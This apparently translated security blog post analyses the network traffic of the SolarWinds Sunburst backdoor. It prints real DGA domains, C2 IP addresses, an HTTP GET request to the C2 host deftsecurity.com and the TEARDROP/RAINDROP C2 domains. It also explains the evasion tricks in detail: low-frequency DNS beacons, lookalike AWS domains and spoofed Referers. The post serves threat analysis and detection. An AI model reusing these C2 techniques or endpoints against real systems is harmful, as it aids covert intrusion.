Part1 Preface
Due to some errors in the previous article, the original article ABC_123 has been deleted. The article was corrected and republished last weekend .
Hello everyone, my name is ABC_123 . In the past few weeks, we have shared the detailed attack process of the Solarwinds supply chain attack incident and the design ideas of the Sunburst backdoor, but most friends still do not understand the communication process of the Sunburst backdoor. In this issue of ABC_123, we will completely review the communication process of the Sunburst backdoor from the perspective of traffic. This can more intuitively show how the Sunburst backdoor bypasses traffic monitoring. I also learned a lot from it.
Note: Many foreign analysis articles have different opinions on the communication process of the Sunburst backdoor, and there are many contradictions in many detailed descriptions. ABC_123 has reviewed articles from various security companies based on its own understanding. There are inevitably some omissions, so please correct them.
Note: Sunburst backdoor communications evaded Einstein, the U.S. cyber attack defense system that took more than a decade and tens of billions of dollars to build.
It is recommended that everyone set the public account "Xitan Laboratory" as a star, otherwise you may not see it! Because official accounts can now display large image push only for frequently read and starred official accounts. How to operate: Click [...] in the upper right corner, and then click [Set as Star].
Part2 Prerequisite knowledge of backdoor communication
How C2 controls the Sunburst backdoor
The previous article ABC_123 introduced it in detail. Let’s briefly review it in this issue. The attacker on the C2 server will indirectly control the behavior of the Sunburst backdoor by controlling the resolution of the C2 domain name to different IP address ranges. Let's look at a simple example to see how the attacker controls the Sunburst backdoor and makes it permanently exit.
First, the Sunburst backdoor initiated a dga domain name request for ea99hr2sfen95nkjlc5g.appsync-api.eu-west-1.avsvmcloud.com . The attacker on the C2 server intended to stop the backdoor from exiting permanently, so it resolved the dga domain name to the IP address 96.31. 172.116 , after Sunburst obtains this IP, it queries the following list, and then immediately changes to the " Truncate " state. After clearing all traces, it permanently terminates execution.
Diagram of C2 controlling Sunburst backdoor
The blue part is the IP address of CONTINUE . When the C2 server attacker resolves the dga domain name into the IP address in the blue part of the figure, it means that the C2 server attacker has not yet decided whether the target is a valuable target and whether to penetrate further, so the Sunburst backdoor will continue to launch dga domain name request in order to receive the next step of instructions sent by the attacker.
The STOP IP address in red . If the attacker later finds that the target computer is of little value, or the protection software installed on the target machine is too strong, he needs to give up penetrating the target. The C2 server attacker will resolve the dga domain name into the red part of the IP address, so that after Sunburst obtains this part of the IP, it will clean up the traces and then stop running permanently.
The purple TARGET part of the IP address . If the attacker feels that the victim target is worthy of further penetration, the dga domain name will be resolved to the IP in the purple part of the picture above, and then a cname domain name will be returned. Sunburst will receive this domain name (deftsecurity.com in the picture) and use it as the second stage. The domain name in the HTTP C2 phase begins to officially receive C2 instructions and return the instruction execution results.
delay timer
C2's domain name server not only controls the behavior of the Sunburst backdoor by resolving the dga domain name to different IP addresses, but also controls the waiting time of the Sunburst backdoor's next execution command by controlling the last 8 bits of the resolved IP address . For example, when the C2 server resolves the dga domain name to the IP address of 96.31.172.116, the Sunburst backdoor will perform an AND operation on the last eight digits of the IP address and the mask 0x54 to obtain an "AND result", and then refer to the table below to select A delay time within which Sunburst randomly selects a delay time.
C2 control backdoor termination case
First, a screenshot from a foreign video is released, describing the entire process of C2 controlling the Sunburst backdoor to terminate its operation.
Step 1 The Sunburst backdoor requests a domain name as follows: lf9prvp9o36mhihw2hrs260g12eu1.appsync-api.eu-west-1.avsvmcloud.com . Use a tool to decrypt the lf9prvp9o36mhihw2hrs260g12eu1 part of this domain name and find that the domain name omeros.local where the target machine is located is obtained . The attacker then resolves the domain name to the IP address 8.18.145.139 . Sunburst calculates the last 8 bytes of the IP address and knows that it needs to delay for one minute before sending the security protection software status information to the C2 server.
After a one-minute delay in step 2 , the Sunburst backdoor initiates the second request and tells the C2 server through the encrypted part of the dga domain name that the target machine has Carbon Black terminal security protection software. The C2 server resolves the dga domain name to 8.18.145.62 . The Sunburst backdoor parses the last 8 bytes of the IP address and learns that it needs to delay the request for 1 day before reinitiating the dga domain name request.
After a one-day delay in step 3 , Sunburst requests instructions from C2 by pinging the following dga domain name. C2 resolves the domain name to 8.18.144.150. Sunburst needs to wait for another day and then initiates a dga domain name request.
After a one-day delay in step 4 , Sunburst pings a dga domain name. C2 resolves the domain name to 8.18.145.151, and Sunburst continues to wait.
After a one-day delay in step 5 , Sunburst pinged a dga domain name. C2 resolved the domain name to 20.140.84.127. Sunburst got the IP and immediately understood that C2 asked it to stop running immediately. This shows that the owner of C2 thought about this domain name . Further computer penetration was of little value , so it was abandoned.
Through this case, it was found that the Sunburst backdoor made great efforts to avoid traffic detection. First, it only initiated 5 DNS requests for the dga domain name within 4 days, and the domain name appsync-api.eu-west-1.avsvmcloud .com is easily reminiscent of the AWS domain name, which led to security personnel later considering it as a normal domain name request when tracing the source. Never has a backdoor been so patient and delayed so long.
Part3 Complete backdoor communication case
Next, let’s look at a complete communication case of the Sunburst backdoor, including the Sunburst backdoor transmitting the victim computer name, security protection software status through the dga domain name, and the CNAME domain name process in the HTTP C2 communication stage sent by c2 to the Sunburst backdoor. This is the first stage; then In the second stage, the Sunburst backdoor initiates a GET request. Backdoor stage.
1 dga domain name transfer stage
Step 12020-06-11 04:00 UTC
Sunburst initiated query: r8stkst71ebqgj66ervisu10bdohu0gt.appsync-api.us-west-2.avsvmcloud.com ⇒ AD domain, the C2 attacker obtained the first part of the content "central.pima.g"
Response: 8.18.144.1 ⇒ Sunburst backdoor sleeps for 1 hour and then continues.
Step 22020-06-11 05:00 UTC
Sunburst initiates query: ulfmcf44qd58t9e82w.appsync-api.us-west-2.avsvmcloud.com ⇒ AD domain, C2 attacker gets part 2 "ov"
Response: 8.18.144.2 ⇒ The Sunburst backdoor sleeps for 1 hour and then continues ( at this point the attacker knows the full domain name of the target computer is central.pima.gov ).
Step 32020-06-11 06:00 UTC
Sunburst initiated query: p50jllhvhmoti8mpbf6p2di.appsync-api.us-west-2.avsvmcloud.com ⇒ No reports.
Response: 8.18.144.16 ⇒ The Sunburst backdoor sleeps for 8 hours and then continues ( at this time the attacker knows that the target's protection software is turned off ).
Step 42020-06-11 14:00 UTC
Sunburst initiated query: (?) ⇒ No new reports
Response: 8.18.144.17 ⇒ The Sunburst backdoor sleeps for 8 hours and then continues ( while the attacker is evaluating whether the target is valuable and worth further penetration )
Step 52020-06-11 22:35 UTC
Sunburst initiated query: j5uqlssr1hfqnn8hkf172mp.appsync-api.us-west-2.avsvmcloud.com ⇒ No report required
Response: 184.72.181.52 ⇒ Sunburst sleeps for 1-3 minutes ( resolving to this IP address, Sunburst will prepare to enter the second phase of HTTP C2 phase )
Step 62020-06-11 22:37 UTC
Sunburst initiates query: 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com ⇒ Sunburst backdoor requests CNAME
Response: deftsecurity.com ⇒ CNAME of the second-stage HTTPS C2 server ( at this time, Sunburst used dga domain name resolution and found that the CNAME value was not empty, so it obtained the CNAME value and used it as the domain name to enter the second-stage HTTP C2 communication stage )
2 Initiate an HTTP request to request instructions from C2
The Sunburst backdoor then enters the HTTP C2 communication stage. Sunburst initiates the following HTTP request to the C2's CNAME value deftsecurity.com, requesting an xml file:
GET /swip/upd/Orion.UI-5.2.0.xml HTTP/1.1
If-None-Match: bfc145s6149c4290ef3b2c1732449c562a24g66d
Host: deftsecurity.com
Connection: Close
As shown in the figure below, the server returns a file that looks like a normal XML assembly. In fact, the attacker's control instructions are encrypted and hidden in the values of some fields in these XML files.
Sunburst obtains the instruction ID and additional parameters of the instruction by parsing the encrypted part of the above xml file. Refer to the following table. If the ID corresponding to the instruction is Exit, the current thread is terminated. If it is SetTime, the delay time is set based on the decrypted additional parameters.
3 Return the command execution results to C2
After decrypting the instructions sent by the attacker from the xml file, Sunburst will execute the instructions and then return the results back to the server. As highlighted in the previous article ABC_123, if the return result is less than 10,000, a json format data will be sent to a URL ending in .woff2 with a PUT request. Sunburst encrypts the execution result and hides it in the json document.
The URL generation rules are as follows (see the previous article for details)
The request packet of Sunburst return data is roughly as follows (this is put together by ABC_123 based on foreign analysis articles, and some header information may be missing)
The request packet is explained as follows:
Next, the Sunburst backdoor will continuously request xml files from the c2 domain name to obtain the instructions that need to be executed, and then send the execution results back to the c2 server in the form of a json document through a PUT request, and then enter the third stage using the CobaltStrike backdoor to perform intranet lateralization stage.
4 CobaltStrike backdoor communication
Next, we enter the third stage. Sunburst will download a vbs script and Loader program, and then place them in the C:\Windows directory, disguised as legitimate files. Then Sunburst uses image hijacking technology to modify the registry and bind dllhost.exe to wscript.exe C:\Windows\[folder]\[trigger].vbs command. At this point, the Sunburst backdoor has completed its mission and the system is silent. Wait for dllhost.exe to execute and further execute the vbs script. The bbs script will run rundll32.exe to load the malicious dll file in the previous step, and then clean up the image hijacking registry of dllhost.exe and clean up the traces.
Deliver TEARDROP Tool
TearDrop found two variants in total:
The first variant is libintl3.dll . This sample is loaded through rundll32.exe and then reads an image file named upbeat_anxiety.jpg from the current directory and ensures that it has a jpg header and extracts the shellcode from it. The CobaltStrike backdoor is connected through Go to infinitysoftwares[.]com for command and control.
The second variant is NETSETUPSVC.dll , which is started by adding a service. It is loaded through svchost.exe and calls the exported function NetSetupServiceMain. The NETSETUPSVC.dll file reuses the code of the libintl3.dll file. Reading the festive_computer.jpg image file from the current directory, the CobaltStrike backdoor provides command and control by connecting to ervsystem[.]com.
TEARDROP uses "twitter.com" as the content of the Referer field in the https protocol, which will make security personnel mistakenly think that the C2 domain name infinitysoftwares[.]com is a normal whitelist domain name, thus evading detection.
The traffic data of TearDrop’s CobaltStrike communication phase is as follows:
Deliver the RAINDROP tool
Exists in the form of bproxy.dll, and then installs a 7z.dll file and extracts the domain penetration tool DSInternals to the victim machine. For the 7z.dll file, the production of this file relies on the 7-zip open source code as the carrier, and the attack code is hidden in the code segment. The backdoor also uses CobaltStrike to achieve lateral control of the intranet by communicating with bigtopweb.com. The Referer disguises itself as bing.com to confuse security personnel and mistakenly think that bigtopweb.com is a normal whitelisted domain name.
At this stage, some CS instances are based on HTTP command and control servers, and some use the SMB network channel \\.\pipe\protected_storage for intranet communication. (The complete data package was not found. You can get a full picture from the log below)
The traffic data of RainDrop’s CobaltStrike communication phase is as follows:
Part4 Summary
1. The Sunburst backdoor activation backdoor randomly waits for 12 to 14 days before being officially activated and executed. The security device logs of some units are retained for about 12 days, and then they will be overwritten by new logs.
2. In the initial stage of C2’s communication to obtain basic information about intranet computer domain names and security protection software, the traffic is hidden in the dga domain name, making it difficult to detect. Moreover, in 3 or 4 days, the Sunburst backdoor only initiated 4 or 5 dga domain name requests, making such low-frequency access even more difficult to detect.
3. Targets with low value will be terminated immediately to prevent them from being discovered by detection equipment.
4. In the end, the attacker only selected about 1% of the valuable targets for lateral penetration of the intranet, and gave up targets with high security protection. This trade-off reduces the probability of discovery.
5. The IP address range of dga domain name resolution is the address range of Microsoft, Google, and Amazon. It is easy to be directly added to the whitelist by the detection software. The entire communication traffic looks like normal traffic and is difficult to identify.
6. The dga domain name appsync-api.us-west-2.avsvmcloud.com used by the Sunburst backdoor confuses security personnel in tracing the source, making them mistakenly think it is an AWS domain name.
7. In summary, you can see the subtlety of Sunburst's design. It is amazing how concealed the traffic level is. ABC_123 will continue to share how FireEye traced the source of this attack. Stay tuned .
The public account focuses on sharing network security technology, including APT event analysis, red team attack and defense, blue team analysis, penetration testing, code audit, etc. One article per week, 99% original, so stay tuned.
Contact me: 0day123abc#gmail.com(replace # with @)